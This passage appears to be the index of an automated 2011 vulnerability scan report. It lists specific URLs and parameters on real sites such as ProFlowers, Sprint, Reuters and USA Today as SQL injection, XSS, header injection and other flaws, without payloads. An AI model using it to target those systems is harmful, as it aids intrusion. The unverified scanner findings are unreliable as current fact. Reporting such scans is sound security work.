XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-03

Report generated by XSS.CX at Sat Sep 03 19:31:37 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1]

1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2]

1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2]

1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1]

2. XPath injection

2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2]

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3]

3. Cross-site scripting (stored)

3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

4. HTTP header injection

4.1. http://m.xp1.ru4.com/activity [redirect parameter]

4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

5.28. http://api.bit.ly/shorten [callback parameter]

5.29. http://api.bit.ly/shorten [longUrl parameter]

5.30. http://api.echoenabled.com/v1/search [q parameter]

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

5.58. http://jlinks.industrybrains.com/jsct [ct parameter]

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.60. http://jlinks.industrybrains.com/jsct [tr parameter]

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter]

5.62. http://lingows.appspot.com/bubble/ [request_id parameter]

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter]

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter]

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter]

5.77. http://www.reuters.com/assets/commentsChild [channel parameter]

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

5.80. http://www.reuters.com/assets/newsFlash [h parameter]

5.81. http://www.reuters.com/assets/newsFlash [w parameter]

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter]

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter]

5.84. https://www.sprint.net/min/ [REST URL parameter 1]

5.85. https://www.sprint.net/performance [REST URL parameter 1]

5.86. https://www.sprint.net/performance/ [REST URL parameter 1]

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1]

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2]

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

6. Flash cross-domain policy

6.1. http://ad.afy11.net/crossdomain.xml

6.2. http://ad.turn.com/crossdomain.xml

6.3. http://altfarm.mediaplex.com/crossdomain.xml

6.4. http://api.bit.ly/crossdomain.xml

6.5. http://b.scorecardresearch.com/crossdomain.xml

6.6. http://bh.contextweb.com/crossdomain.xml

6.7. http://c.betrad.com/crossdomain.xml

6.8. http://c.casalemedia.com/crossdomain.xml

6.9. http://cdn.gigya.com/crossdomain.xml

6.10. http://cdn.taboolasyndication.com/crossdomain.xml

6.11. http://cdn.turn.com/crossdomain.xml

6.12. http://ce.lijit.com/crossdomain.xml

6.13. http://gannett.gcion.com/crossdomain.xml

6.14. http://get.lingospot.com/crossdomain.xml

6.15. http://gscounters.gigya.com/crossdomain.xml

6.16. http://i.casalemedia.com/crossdomain.xml

6.17. http://ib.adnxs.com/crossdomain.xml

6.18. http://img-cdn.mediaplex.com/crossdomain.xml

6.19. http://img.mediaplex.com/crossdomain.xml

6.20. http://imp.fetchback.com/crossdomain.xml

6.21. http://init.lingospot.com/crossdomain.xml

6.22. http://l.betrad.com/crossdomain.xml

6.23. http://m.xp1.ru4.com/crossdomain.xml

6.24. http://metrics.sprint.com/crossdomain.xml

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml

6.26. http://pix04.revsci.net/crossdomain.xml

6.27. http://pixel.mathtag.com/crossdomain.xml

6.28. http://pixel.quantserve.com/crossdomain.xml

6.29. http://premium.mookie1.com/crossdomain.xml

6.30. http://query.yahooapis.com/crossdomain.xml

6.31. http://r.casalemedia.com/crossdomain.xml

6.32. http://r.turn.com/crossdomain.xml

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

6.34. http://s.meebocdn.net/crossdomain.xml

6.35. http://s0.2mdn.net/crossdomain.xml

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

6.37. https://socialize.gigya.com/crossdomain.xml

6.38. http://statse.webtrendslive.com/crossdomain.xml

6.39. http://sync.adap.tv/crossdomain.xml

6.40. http://sync.mathtag.com/crossdomain.xml

6.41. http://tags.bluekai.com/crossdomain.xml

6.42. http://tcr.tynt.com/crossdomain.xml

6.43. http://trc.taboolasyndication.com/crossdomain.xml

6.44. http://turn.nexac.com/crossdomain.xml

6.45. http://usatoday1.112.2o7.net/crossdomain.xml

6.46. http://wa.proflowers.com/crossdomain.xml

6.47. http://www.wunderground.com/crossdomain.xml

6.48. http://adadvisor.net/crossdomain.xml

6.49. http://ads.adbrite.com/crossdomain.xml

6.50. http://cim.meebo.com/crossdomain.xml

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

6.52. http://content.usatoday.com/crossdomain.xml

6.53. http://grfx.cstv.com/crossdomain.xml

6.54. http://mi.adinterax.com/crossdomain.xml

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml

6.56. http://rd.meebo.com/crossdomain.xml

6.57. http://snas.nbcuni.com/crossdomain.xml

6.58. http://syndication.mmismm.com/crossdomain.xml

6.59. http://www.facebook.com/crossdomain.xml

6.60. http://www.meebo.com/crossdomain.xml

6.61. http://www.reuters.com/crossdomain.xml

6.62. http://www.sacbee.com/crossdomain.xml

6.63. http://www.youtube.com/crossdomain.xml

6.64. http://api.twitter.com/crossdomain.xml

6.65. http://sales.reuters.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.2. http://content.usatoday.com/clientaccesspolicy.xml

7.3. http://metrics.sprint.com/clientaccesspolicy.xml

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml

7.6. http://s0.2mdn.net/clientaccesspolicy.xml

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.9. http://wa.proflowers.com/clientaccesspolicy.xml

8. SSL cookie without secure flag set

9. Session token in URL

10. SSL certificate

10.1. https://sprintlb.ehosts.net/

10.2. https://socialize.gigya.com/

10.3. https://www.linkedin.com/

10.4. https://www.sprint.net/

11. Cookie scoped to parent domain

11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

11.2. http://api.twitter.com/1/statuses/user_timeline.json

11.3. http://www.personalcreations.com/

11.4. http://ad.afy11.net/ad

11.5. http://ad.turn.com/server/ads.js

11.6. http://ads.adbrite.com/adserver/vdi/742697

11.7. http://ads.revsci.net/adserver/ako

11.8. http://ads.revsci.net/adserver/ako

11.9. http://ads.revsci.net/adserver/ako

11.10. http://b.scorecardresearch.com/b

11.11. http://b.scorecardresearch.com/p

11.12. http://b.scorecardresearch.com/r

11.13. http://bh.contextweb.com/bh/rtset

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

11.15. http://ce.lijit.com/merge

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

11.21. http://i.casalemedia.com/imp.gif

11.22. http://ib.adnxs.com/getuid

11.23. http://image2.pubmatic.com/AdServer/Pug

11.24. http://imp.fetchback.com/serve/fb/adtag.js

11.25. http://imp.fetchback.com/serve/fb/imp

11.26. http://leadback.advertising.com/adcedge/lb

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif

11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

11.36. http://pixel.mathtag.com/sync

11.37. http://r.casalemedia.com/rum

11.38. http://r.openx.net/set

11.39. http://r.turn.com/r/bd

11.40. http://r.turn.com/r/beacon

11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

11.42. http://rma-api.gravity.com/v1/beacons/initialize

11.43. http://rt.legolas-media.com/lgrt

11.44. http://sync.adap.tv/sync

11.45. http://sync.mathtag.com/sync

11.46. http://syndication.mmismm.com/tntwo.php

11.47. http://tacoda.at.atwola.com/rtx/r.js

11.48. http://tags.bluekai.com/site/4195

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/

11.51. http://www.bizographics.com/collect/

11.52. https://www.linkedin.com/secure/login

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

12. Cookie without HttpOnly flag set

12.1. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

12.2. http://trc.taboolasyndication.com/reuters/trc/2/json

12.3. https://www.linkedin.com/secure/login

12.4. http://www.personalcreations.com/

12.5. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

12.6. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

12.7. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

12.8. http://www.personalcreations.com/just-because-gifts-PJBEBSL

12.9. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

12.10. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

12.11. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

12.12. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

12.13. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

12.14. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

12.15. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

12.16. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

12.17. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

12.18. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

12.19. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

12.20. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

12.21. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

12.22. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

12.23. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

12.24. http://www.publish2.com/newsgroups/state-worker.js

12.25. http://ad.afy11.net/ad

12.26. http://ad.turn.com/server/ads.js

12.27. http://ad.yieldmanager.com/pixel

12.28. http://adadvisor.net/adscores/g.js

12.29. http://ads.adbrite.com/adserver/vdi/742697

12.30. http://ads.revsci.net/adserver/ako

12.31. http://ads.revsci.net/adserver/ako

12.32. http://ads.revsci.net/adserver/ako

12.33. http://b.scorecardresearch.com/b

12.34. http://b.scorecardresearch.com/p

12.35. http://b.scorecardresearch.com/r

12.36. http://bh.contextweb.com/bh/rtset

12.37. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

12.38. http://ce.lijit.com/merge

12.39. http://cm.npc-mcclatchy.overture.com/js_1_0/

12.40. http://community.sprint.com/baw/community/buzzaboutwireless

12.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

12.42. http://community.sprint.com/baw/community/sprintblogs

12.43. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

12.44. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

12.45. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

12.46. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

12.47. http://i.casalemedia.com/imp.gif

12.48. http://image2.pubmatic.com/AdServer/Pug

12.49. http://imp.fetchback.com/serve/fb/adtag.js

12.50. http://imp.fetchback.com/serve/fb/imp

12.51. http://leadback.advertising.com/adcedge/lb

12.52. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

12.53. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

12.54. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

12.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

12.56. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.57. http://pix04.revsci.net/F09828/a4/0/0/0.js

12.58. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

12.59. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

12.60. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

12.61. http://pixel.mathtag.com/sync

12.62. http://r.casalemedia.com/rum

12.63. http://r.openx.net/set

12.64. http://r.turn.com/r/bd

12.65. http://r.turn.com/r/beacon

12.66. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

12.67. http://rma-api.gravity.com/v1/beacons/initialize

12.68. http://rt.legolas-media.com/lgrt

12.69. http://sitelife.usatoday.com/ver1.0/Content/direct/scripts/DirectProxyFast.js

12.70. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

12.71. http://sync.adap.tv/sync

12.72. http://sync.mathtag.com/sync

12.73. http://syndication.mmismm.com/tntwo.php

12.74. http://tacoda.at.atwola.com/rtx/r.js

12.75. http://tags.bluekai.com/site/4195

12.76. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

12.77. http://tu.connect.wunderloop.net/TU/1/1/1/

12.78. http://www.bizographics.com/collect/

12.79. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

13. Password field with autocomplete enabled

13.1. http://community.sprint.com/baw/community/buzzaboutwireless

13.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

13.3. http://community.sprint.com/baw/community/sprintblogs

13.4. http://community.sprint.com/baw/groups

13.5. http://community.sprint.com/baw/index.jspa

13.6. http://community.sprint.com/baw/reviews.jspa

13.7. https://www.linkedin.com/secure/login

13.8. http://www.sprint.com/index_c.html

13.9. https://www.sprint.net/performance/

13.10. https://www.sprint.net/performance/

14. Source code disclosure

14.1. http://community.sprint.com/baw/community/buzzaboutwireless

14.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

14.3. http://community.sprint.com/baw/community/sprintblogs

14.4. http://community.sprint.com/baw/index.jspa

15. ASP.NET debugging enabled

15.1. http://usata1.gcion.com/Default.aspx

15.2. http://www.wisdomtree.com/Default.aspx

16. Referer-dependent response

16.1. http://ads.adbrite.com/adserver/vdi/742697

16.2. http://www.facebook.com/plugins/like.php

16.3. http://www.facebook.com/plugins/likebox.php

16.4. http://www.youtube.com/embed/xXftjfC3b5o

17. Cross-domain POST

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

18.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

18.3. http://ad.doubleclick.net/adj/sacbee_cim/

18.4. http://ad.doubleclick.net/adj/uap.reuters/uap

18.5. http://ad.turn.com/server/ads.js

18.6. http://ad.turn.com/server/ads.js

18.7. http://ad.yieldmanager.com/pixel

18.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

18.9. http://cdn.optmd.com/V2/89733/235451/index.html

18.10. http://cm.g.doubleclick.net/pixel

18.11. http://cm.g.doubleclick.net/pixel

18.12. http://cm.npc-mcclatchy.overture.com/js_1_0/

18.13. http://cms.ad.yieldmanager.net/v1/cms

18.14. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

18.15. http://googleads.g.doubleclick.net/pagead/ads

18.16. http://googleads.g.doubleclick.net/pagead/ads

18.17. http://googleads.g.doubleclick.net/pagead/ads

18.18. http://googleads.g.doubleclick.net/pagead/ads

18.19. http://googleads.g.doubleclick.net/pagead/ads

18.20. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

18.21. http://imp.fetchback.com/serve/fb/imp

18.22. http://s6.scribdassets.com/aggregated/javascript/base.js

18.23. http://static.lingospot.com/js/all.js

18.24. http://www.facebook.com/plugins/likebox.php

18.25. http://www.personalcreations.com/

18.26. http://www.personalcreations.com/

18.27. http://www.personalcreations.com/

18.28. http://www.personalcreations.com/

18.29. http://www.reuters.com/assets/commentsChild

18.30. http://www.reuters.com/assets/newsFlash

18.31. http://www.scribd.com/embeds/63688924/content

18.32. http://www.scribd.com/embeds/63688924/content_inner

19. Cross-domain script include

19.1. http://ad.turn.com/server/ads.js

19.2. http://ad.turn.com/server/ads.js

19.3. http://blogs.sacbee.com/the_state_worker/

19.4. http://cdn.optmd.com/V2/89733/235451/index.html

19.5. http://community.sprint.com/baw/index.jspa

19.6. http://content.usatoday.com/communities/campusrivalry/topics

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://grfx.cstv.com/scripts/oas-omni-controls.js

19.10. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

19.11. http://www.facebook.com/plugins/likebox.php

19.12. http://www.personalcreations.com/

19.13. http://www.personalcreations.com/CatalogQuickOrder.aspx

19.14. http://www.personalcreations.com/CustomerService-ContactUs.aspx

19.15. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

19.16. http://www.personalcreations.com/default.aspx

19.17. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

19.18. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

19.19. http://www.personalcreations.com/just-because-gifts-PJBEBSL

19.20. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

19.21. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

19.22. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

19.23. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

19.24. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

19.25. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

19.26. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

19.27. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

19.28. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

